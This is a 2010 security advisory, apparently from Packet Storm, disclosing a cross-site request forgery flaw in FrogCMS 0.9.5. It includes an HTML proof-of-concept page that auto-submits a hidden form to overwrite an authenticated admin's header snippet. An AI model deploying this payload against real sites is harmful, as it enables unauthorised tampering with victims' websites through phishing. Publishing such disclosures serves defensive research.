FrogCMS version 0.9.5 suffers from a cross site request forgery vulnerability.
4f04a0ab80ccca0397b043341f934b236780cc1f03bbcbab50e6d63b7fd32c9d# Software : FrogCMS v0.9.5
# Author : Jeremiah Talamantes for RedTeam Security
# Date : June 10, 2010
# OS : Windows
# Tested on : XP SP2 EN (Virtual PC)
# Type of vuln : CSRF
# Description :
# Lack of security controls in place to prevent Cross Site
# Request Forgery attacks. The POC below will open a core
# module (snippet) containing HTML that rendered as the
# "header" for each page.
#
# An attacker can trick an authenticated user (email phish)
# into clicking on a malicious web page (POC) that is
# designed to overwrite the contents of the default HEADER
# snippet.
# RedTeam Security / RedTeam Security Labs
# http://www.redteamsecure.com/labs
# POC Code
<html>
<head>
<title>FrogCMS CSRF</title>
<script type="text/javascript">
function myfunc () {
var frm = document.getElementById("csrf");
frm.submit();
}
window.onload = myfunc;
</script>
</head>
<body>
<!-- Update the form action parameter to match the victim FrogCMS URL -->
<form id="csrf" action="http://localhost/frogcms/admin/?/snippet/edit/1" method="post">
<input type="hidden" id="snippet_name" name="snippet[name]" value="FrogCMS CSRF" />
<input type="hidden" id="snippet_filter_id" name="snippet[filter_id]" value="" />
<input type="hidden" id="snippet_content" name="snippet[content]" value="FrogCMS CSRF" />
</form>
</body>
</html>
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed